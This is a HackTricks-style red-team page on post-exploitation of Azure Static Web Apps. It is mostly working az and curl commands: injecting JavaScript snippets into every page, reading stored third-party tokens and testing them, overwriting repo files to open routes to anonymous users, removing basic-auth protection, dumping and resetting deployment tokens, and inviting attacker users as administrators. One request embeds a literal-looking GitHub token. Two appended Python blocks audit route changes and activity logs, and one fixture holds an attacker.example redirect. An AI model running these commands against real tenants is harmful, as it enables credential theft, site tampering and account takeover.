# Az - Static Web Apps Post Exploitation
> [!TIP]
> Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> Support HackTricks
> - Check the subscription plans!
> - Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
> - Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## Azure Static Web Apps

For more information about this service check:
### Microsoft.Web/staticSites/snippets/write

It's possible to make a static web app load arbitrary HTML code by creating a snippet. This could allow an attacker to inject JS code into the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).

The following command creates a snippet that will always be loaded by the web app:

```bash
# "content" is base64: <script>alert("Azure Snippet")</script>
az rest \
  --method PUT \
  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
  --headers "Content-Type=application/json" \
  --body '{
    "properties": {
      "name": "supersnippet",
      "location": "Body",
      "applicableEnvironmentsMode": "AllEnvironments",
      "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
      "environments": [],
      "insertBottom": false
    }
  }'
```
### Read configured third-party credentials

As explained in the App Service section:

By running the following command it's possible to read the third-party credentials configured in the current account. Note that, for example, if some Github credentials are configured under a different user, you won't be able to access the token of that other user.

```bash
az rest --method GET \
  --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```

This command returns the Github, Bitbucket, Dropbox and OneDrive tokens.

Here are some example commands to check the tokens:

```bash
# GitHub – List Repositories
curl -H "Authorization: token <token>" \
  -H "Accept: application/vnd.github.v3+json" \
  https://api.github.com/user/repos

# Bitbucket – List Repositories
curl -H "Authorization: Bearer <token>" \
  -H "Accept: application/json" \
  https://api.bitbucket.org/2.0/repositories

# Dropbox – List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  --data '{"path": ""}'

# OneDrive – List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
  -H "Accept: application/json" \
  https://graph.microsoft.com/v1.0/me/drive/root/children
```
### Overwrite files - Overwrite routes, HTML, JS…

It's possible to overwrite a file inside the Github repo hosting the app through Azure if it has a Github token, by sending a request like the following, which indicates the path of the file to overwrite, the file content and the commit message.

This could be abused by attackers to basically change the content of the web app to serve malicious content (steal credentials, mnemonic keys…) or just re-route certain paths to their servers by overwriting the staticwebapp.config.json file.

> [!WARNING]
> Note that if an attacker manages to compromise the Github repo in any way, they could also overwrite the file directly from Github.

```bash
# "contentBase64Encoded" is a base64 staticwebapp.config.json that rewrites
# and redirects the /profile route and opens it to the "anonymous" role
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
  -H "Content-Type: application/json" \
  -d '{
    "commit": {
      "message": "Update static web app route configuration",
      "branchName": "main",
      "committer": {
        "name": "Azure App Service",
        "email": "donotreply@microsoft.com"
      },
      "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
      "filePath": "staticwebapp.config.json",
      "message": "Update static web app route configuration",
      "repoName": "carlospolop/my-first-static-web-app",
      "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
    },
    "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
  }'
```
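A defender's review of such a route change, added here as an example (not code from the original page): the proposed config is the page's base64 payload decoded, the baseline config and the extra `/login` route are constructed, and `APP_HOST` reuses the app domain shown later on the page. The check flags added/removed routes, auth downgraded to `anonymous`, new rewrites, and redirects that leave the app's own domain.

```python
from urllib.parse import urlparse

# Constructed baseline: the repo's staticwebapp.config.json before the
# overwrite described above (hypothetical values, not from the page).
BASELINE = {
    "navigationFallback": {"rewrite": "/index.html"},
    "routes": [{"route": "/profile", "allowedRoles": ["authenticated"]}],
}

# The config the page's request pushes (decoded from its base64 payload),
# plus one constructed /login route to exercise the off-domain redirect check.
PROPOSED = {
    "navigationFallback": {"rewrite": "/index.html"},
    "routes": [
        {"route": "/profile", "methods": ["get", "head", "post"],
         "rewrite": "/p1", "redirect": "/lalala2", "statusCode": 301,
         "allowedRoles": ["anonymous"]},
        {"route": "/login", "redirect": "https://attacker.example/login"},
    ],
}

APP_HOST = "mango-beach-071d9340f.4.azurestaticapps.net"  # app domain from the page


def audit_routes(baseline, proposed, app_host):
    """Compare two route configs and return the changes a reviewer must see:
    added/removed routes, auth downgraded to anonymous, new rewrites, and
    redirects that leave the app's own domain."""
    findings = []
    old = {r["route"]: r for r in baseline.get("routes", [])}
    new = {r["route"]: r for r in proposed.get("routes", [])}
    for path in sorted(new.keys() - old.keys()):
        findings.append(f"route added: {path}")
    for path in sorted(old.keys() - new.keys()):
        findings.append(f"route removed: {path}")
    for path, rule in new.items():
        old_rule = old.get(path, {})
        old_roles = set(old_rule.get("allowedRoles", []))
        if "anonymous" in rule.get("allowedRoles", []) and old_roles - {"anonymous"}:
            findings.append(f"auth removed on {path}: {sorted(old_roles)} -> anonymous")
        if rule.get("rewrite") and rule["rewrite"] != old_rule.get("rewrite"):
            findings.append(f"rewrite changed on {path}: -> {rule['rewrite']}")
        target = rule.get("redirect", "")
        host = urlparse(target).netloc
        if host and host != app_host:
            findings.append(f"external redirect on {path}: {target}")
    if proposed.get("navigationFallback") != baseline.get("navigationFallback"):
        findings.append("navigationFallback changed")
    return findings
```

Run `audit_routes(BASELINE, PROPOSED, APP_HOST)` in a CI step or branch-protection check so a commit that only touches `staticwebapp.config.json` still gets a human look.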
### Microsoft.Web/staticSites/config/write

With this permission it's possible to change the password protecting the static web app, or even remove the protection for all environments, by sending a request like the following:

```bash
# Change password
az rest --method put \
  --url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
  --headers 'Content-Type=application/json' \
  --body '{
    "name": "basicAuth",
    "type": "Microsoft.Web/staticSites/basicAuth",
    "properties": {
      "password": "SuperPassword123.",
      "secretUrl": "",
      "applicableEnvironmentsMode": "AllEnvironments"
    }
  }'

# Remove the need of a password
az rest --method put \
  --url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
  --headers 'Content-Type=application/json' \
  --body '{
    "name": "basicAuth",
    "type": "Microsoft.Web/staticSites/basicAuth",
    "properties": {
      "secretUrl": "",
      "applicableEnvironmentsMode": "SpecifiedEnvironments",
      "secretState": "None"
    }
  }'
```
### Microsoft.Web/staticSites/listSecrets/action

This permission allows obtaining the API key (deployment token) of the static app.

Using az rest:

```bash
az rest --method POST \
  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
```

Using AzCLI:

```bash
az staticwebapp secrets list --name <appname> --resource-group <RG>
```

Then, to update the app using the token you can run the following command. Note that this command was generated by checking how the Github Action https://github.com/Azure/static-web-apps-deploy works, since it's the one Azure configures by default. Therefore, the image and the parameters might change in the future.

> [!TIP]
> To deploy the app you can use the `swa` tool from https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token or follow these steps:
>
> - Download the repo https://github.com/staticwebdev/react-basic (or any other repo you want to deploy) and run `cd react-basic`.
> - Change the code you want to deploy.
> - Deploy it by running (remember to change the `<api-token>`):
>
> ```bash
> docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
> ```

> [!WARNING]
> Even if you have the token you won't be able to deploy the app if the Deployment Authorization Policy is set to Github. To use the token you will need the permission Microsoft.Web/staticSites/write to change the deployment method to use the API token.
### Microsoft.Web/staticSites/write

With this permission it's possible to change the source of the static web app to a different Github repository; however, it won't take effect directly, since the deployment must be done through a Github Action.

However, if the Deployment Authorization Policy is set to Github, it's possible to update the app from the new source repository!

If the Deployment Authorization Policy isn't set to Github, you can change it with the same Microsoft.Web/staticSites/write permission.

```bash
# Change the source to a different Github repository
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main

# Update the deployment method to Github
# (the repositoryToken can be obtained with:
#  az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01")
az rest --method PATCH \
  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>?api-version=2022-09-01" \
  --headers 'Content-Type=application/json' \
  --body '{
    "properties": {
      "allowConfigFileUpdates": true,
      "stagingEnvironmentPolicy": "Enabled",
      "buildProperties": {
        "appLocation": "/",
        "apiLocation": "",
        "appArtifactLocation": "build"
      },
      "deploymentAuthPolicy": "GitHub",
      "repositoryToken": "<github_token>"
    }
  }'
```
Example Github Action to deploy the app:

```yaml
name: Azure Static Web Apps CI/CD

on:
  push:
    branches:
      - main
  pull_request:
    types: [opened, synchronize, reopened, closed]
    branches:
      - main

jobs:
  build_and_deploy_job:
    if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed')
    runs-on: ubuntu-latest
    name: Build and Deploy Job
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: actions/checkout@v3
        with:
          submodules: true
          lfs: false
      - name: Install OIDC Client from Core Package
        run: npm install @actions/core@1.6.0 @actions/http-client
      - name: Get Id Token
        uses: actions/github-script@v6
        id: idtoken
        with:
          script: |
            const coredemo = require('@actions/core')
            return await coredemo.getIDToken()
          result-encoding: string
      - name: Build And Deploy
        id: builddeploy
        uses: Azure/static-web-apps-deploy@v1
        with:
          azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication
          action: "upload"
          ###### Repository/Build Configurations - These values can be configured to match your app requirements. ######
          # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig
          app_location: "/" # App source code path
          api_location: "" # Api source code path - optional
          output_location: "build" # Built app content directory - optional
          github_id_token: ${{ steps.idtoken.outputs.result }}
          ###### End of Repository/Build Configurations ######

  close_pull_request_job:
    if: github.event_name == 'pull_request' && github.event.action == 'closed'
    runs-on: ubuntu-latest
    name: Close Pull Request Job
    steps:
      - name: Close Pull Request
        id: closepullrequest
        uses: Azure/static-web-apps-deploy@v1
        with:
          action: "close"
```
### Microsoft.Web/staticSites/resetapikey/action

With this permission it's possible to reset the API key of the static web app, which could DoS the workflows that deploy the app automatically.

```bash
az rest --method POST \
  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/resetapikey?api-version=2019-08-01"
```
### Microsoft.Web/staticSites/createUserInvitation/action

This permission allows creating an invitation for a user so they can access the protected routes inside the static web app with a specific given role.

The login is at a path like /.auth/login/github for github or /.auth/login/aad for Entra ID, and a user can be invited with the following command:

```bash
# --authentication-provider: AAD, Facebook, GitHub, Google, Twitter
# --domain: domain of the app
# --invitation-expiration-in-hours: 7 days (168) is the max
# --roles: comma separated list of roles
# --user-details: Github username in this case
az staticwebapp users invite \
  --authentication-provider Github \
  --domain mango-beach-071d9340f.4.azurestaticapps.net \
  --invitation-expiration-in-hours 168 \
  --name my-first-static-web-app \
  --roles "contributor,administrator" \
  --user-details username \
  --resource-group Resource_Group_1
```
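As an added defensive example (not code from the original page), a triage pass over Azure Activity Log records for the privileged operations covered in the sections above, from snippets/write through createUserInvitation/action. The records are constructed and simplified (a real export nests `status` and `operationName` under `value` and carries many more fields); the operation names are the ones listed on this page.

```python
from collections import Counter

# Privileged Static Web Apps operations covered in the sections above; each one
# changes what the site serves, who can deploy it, or who can reach protected routes.
SENSITIVE_OPS = {
    "Microsoft.Web/staticSites/snippets/write": "HTML/JS snippet injected into every page",
    "Microsoft.Web/staticSites/config/write": "basicAuth password changed or removed",
    "Microsoft.Web/staticSites/listSecrets/action": "deployment token read",
    "Microsoft.Web/staticSites/resetapikey/action": "deployment token rotated (CI breaks)",
    "Microsoft.Web/staticSites/write": "source repo / deploymentAuthPolicy changed",
    "Microsoft.Web/staticSites/createUserInvitation/action": "user invited to protected routes",
}

# Constructed, simplified Activity Log records (not a real export).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00Z", "caller": "alice@contoso.example",
     "operationName": "Microsoft.Web/staticSites/read", "status": "Succeeded"},
    {"time": "2024-05-01T10:02:11Z", "caller": "bob@contoso.example",
     "operationName": "Microsoft.Web/staticSites/listSecrets/action", "status": "Succeeded"},
    {"time": "2024-05-01T10:02:40Z", "caller": "bob@contoso.example",
     "operationName": "Microsoft.Web/staticSites/snippets/write", "status": "Succeeded"},
    {"time": "2024-05-01T10:03:05Z", "caller": "bob@contoso.example",
     "operationName": "Microsoft.Web/staticSites/config/write", "status": "Failed"},
    {"time": "2024-05-01T15:30:00Z", "caller": "carol@contoso.example",
     "operationName": "Microsoft.Web/staticSites/createUserInvitation/action", "status": "Succeeded"},
]


def triage(events, ops=SENSITIVE_OPS):
    """Return (time, caller, operation, status, impact) for every sensitive
    Static Web Apps operation; failed attempts are kept since they show intent."""
    hits = []
    for ev in events:
        op = ev.get("operationName", "")
        if op in ops:
            hits.append((ev["time"], ev["caller"], op, ev["status"], ops[op]))
    return hits


def suspicious_callers(hits, threshold=2):
    """Principals with at least `threshold` sensitive operations: a token read
    followed by a snippet or config write is exactly the chain described above."""
    counts = Counter(h[1] for h in hits)
    return {caller: n for caller, n in counts.items() if n >= threshold}
```

Point `triage()` at the JSON you get from `az monitor activity-log list` (after flattening the nested fields) to alert on these operations rather than reviewing them after the fact.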
### Pull Requests

By default, Pull Requests from a branch inside the repo will be automatically built and deployed to a staging environment. This could be abused by an attacker with write access to the repo who cannot get past the branch protections of the production branch (usually main) in order to deploy a malicious version of the app to the staging URL.

The staging URL has this format: https://<app-subdomain>-<PR-num>.<region>.<res-of-app-domain> like: https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net

> [!TIP]
> Note that by default external PRs won't run the workflows unless the author already has at least 1 PR merged into the repository. An attacker could send a legitimate PR to the repo and then send a malicious PR to deploy a malicious app in the staging environment. HOWEVER, there is an unexpected protection: the default Github Action that deploys to the static web app needs access to the secret storing the deployment token (like `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) even if the deployment is done with the IDToken. This means that, since the external PR won't have access to this secret and the external PR can't modify the Workflow to put any token there without the PR being accepted, this attack won't really work.